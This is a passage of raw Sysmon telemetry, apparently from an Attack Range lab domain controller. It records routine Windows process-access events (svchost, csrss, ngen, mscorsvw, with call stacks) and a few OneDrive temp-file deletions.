\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080734Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:45.825{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000080733Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:45.825{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000080732Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:45.825{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000080731Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:45.825{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000080730Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:45.825{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000080729Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:45.825{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EC25-607E-C20E-00000000BB01}4232C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080728Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:45.825{A7A01FEF-C0A6-607E-7805-00000000BB01}4247020C:\Windows\system32\sihost.exe{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+37dac|C:\Windows\System32\modernexecserver.dll+37d4f|C:\Windows\System32\modernexecserver.dll+375a6|C:\Windows\System32\modernexecserver.dll+1a1c4|C:\Windows\System32\modernexecserver.dll+3191d|C:\Windows\System32\modernexecserver.dll+32871|C:\Windows\System32\modernexecserver.dll+3278f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080727Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:45.825{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC25-607E-C20E-00000000BB01}4232C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080726Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:45.747{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EC25-607E-C10E-00000000BB01}3004C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080725Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:45.732{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EC25-607E-C10E-00000000BB01}3004C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080724Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:45.732{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC25-607E-C10E-00000000BB01}3004C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080723Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:45.700{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EC25-607E-C00E-00000000BB01}5472C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080722Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:45.685{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EC25-607E-C00E-00000000BB01}5472C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080721Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:45.685{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC25-607E-C00E-00000000BB01}5472C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080720Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:45.669{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000080719Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:45.669{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000080718Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:45.669{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 23542300x800000000000000080717Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:45.638{A7A01FEF-EBFE-607E-1F0E-00000000BB01}3308ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\ADMINI~1\AppData\Local\Temp\aria-debug-6624.logMD5=1B7D75B54ED8D79EC74465BDC6F6AF67,SHA256=901EB2CEF47916DDDD51EE7A0FF92B95C4433F980EEC485877A0640CD25A0486,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080716Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:45.638{A7A01FEF-EBFE-607E-1F0E-00000000BB01}3308ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\ADMINI~1\AppData\Local\Temp\aria-debug-3384.logMD5=0544D7CF54FB4489BEB01ED739CD98F7,SHA256=9E2DD02C1D82ED099D883683522526A103C01D1303B03FF4652DED74CE2498D9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000080715Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:45.607{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-EC25-607E-BF0E-00000000BB01}928C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080714Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:45.607{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EC25-607E-BF0E-00000000BB01}928C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080713Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:45.607{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC25-607E-BF0E-00000000BB01}928C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\n